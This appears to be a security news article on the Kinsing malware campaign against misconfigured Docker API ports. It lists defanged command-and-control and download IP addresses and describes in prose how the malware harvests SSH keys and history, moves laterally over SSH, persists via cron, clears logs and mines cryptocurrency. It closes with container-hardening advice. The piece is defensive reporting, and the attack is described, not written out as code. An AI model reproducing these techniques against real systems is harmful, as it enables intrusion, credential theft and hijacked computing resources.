A campaign that targets misconfigured Docker Daemon API ports through Kinsing malware was reported by security researchers from Aqua Security. The campaign exploited the ports to run an Ubuntu container.
According to the researchers, Kinsing malware’s strings revealed that it is a Golang-based Linux agent. The researchers ran the malware to examine its behavior and found that before deploying its payload, the malware initiated communication with the following IP addresses:
45.10.88[.]102 – Server did not respond.
91.215.169[.]111 – Connection established. Most likely the main C&C server. The malware sent small encrypted messages on regular intervals with this host.
217.12.221[.]244/spre.sh - Connection established. Used to download the shell script spre.sh
193.33.87[.[219 - Connection established. Used to download the cryptomining malware kdevtmpfsi.
The downloaded spre.sh shell script was used for lateral movement across the container network in a bid to spread the malware. The shell script passively gathered data from /.ssh/config, .bash_history, /.ssh/known_hosts, and other similar locations. It then attempted to establish connection to each host by entering user and key combinations through SSH. If the connection was successful, the aforementioned shell script was downloaded in this location and it ran the malware on other hosts or containers in the network. After the spre.sh attack, the malware ran the kdevtmpfsi cryptominer.
For evasion and persistence, the malware utilized the shell script d.sh that did the following:
Disabled security measures and cleared log
Downloaded and ran the shell script every minute using crontab
Halted and deleted files related to numerous applications like other malware and cryptominers
Installed and ran the Kinsing malware
Killed other malicious Docker containers and deleted their image
Looked for other commands running and cron; if found, it deletes all cron jobs including its own.
Protecting containers against threats
Incessant and ever-increasing organizational requirements have led more enterprises to leverage containers that can keep up with the scale of the demand. As more companies utilize containers, more cybercriminals are also finding these as an attractive and possibly lucrative target. According to the findings of Trend Micro researchers, misconfigured containers have long been on the receiving end of cryptocurrency miners and botnet attacks, and may allow cybercriminals to gain a backdoor into an organization’s system. To protect containers against such threats, enterprises are advised to perform the following:
Secure the container host. Host containers in a container-focused OS to reduce the overall attack surface, and use tools to monitor the host’s health.
Secure the networking environment. Filter and monitor internal and external traffic by taking advantage of controls like an intrusion prevention system (IPS) and web filtering.
Secure the management stack. The container registry should be secured and monitored, and the Kubernetes installation locked down.
Secure the build pipeline. Install strong endpoint controls and implement an access control scheme.